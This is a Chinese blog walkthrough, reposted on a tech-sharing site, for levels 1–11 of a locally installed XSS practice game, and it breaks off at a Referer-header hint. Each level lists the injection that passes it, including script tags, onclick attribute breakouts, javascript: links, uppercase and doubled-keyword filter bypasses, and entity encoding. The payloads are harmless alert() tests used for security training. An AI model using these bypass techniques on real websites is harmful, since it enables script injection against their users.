标签：XSS &# xxx alert 小游戏 复现 onclick nclick 页面

环境安装：

• PHPstudy
• xss闯关小游戏
• 火狐浏览器

把安装包解压到www目录下即可

开始闯关：

游戏开始页面，点击图片进入第一关

level1——

这一关将test改成<script>alert(/xxx/)</script>即可

通关页面

level2——"οnclick="alert(/xxx/)

这一关要查看源代码

找到test的位置，发现第二处有突破口

输入"onclick="alert(/xxx/)然后点击页面即可

level3——'οnclick='alert(/xxx/)

这一关把双引号改成了单引号所以输入'onclick='alert(/xxx/)即可

level4——"οnclick="alert(/xxx/)

这一关与第二关一样"onclick="alert(/xxx/)

level5——"><a href=" javascript:alert(1)"

用a标签如："><a href=" javascript:alert(1)"

level6——"Onclick="alert(1)

将O大写即可绕过如："Onclick="alert(1)

level7——"oonnclick="alert(1)

用双写绕过,如："oonnclick="alert(1)

level8——javascript:alert(1)

将javascript:alert(1)进行实体编码绕过，如：javascript:alert(1)

level9——javascr ipt:alert(1)//http://

这里限制了网址格式并且过滤了script，所以要伪装一下，如：javascr ipt:alert(1)//http://

level10——!&t_sort=" type=“text” οnclick="alert(1)

自己添加一个弹框，如：!&t_sort=" type="text" onclick="alert(1)

level11——

页面没有突破口，先看源码吧，发现什么了么？都有隐藏属性，但是ref好像是Referer

那我们来抓包看看，发现没有Referer字段，那我们就添加一个

标签：XSS,&#,xxx,alert,小游戏,复现,onclick,nclick,页面
来源： https://blog.51cto.com/u_15274949/2922466

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。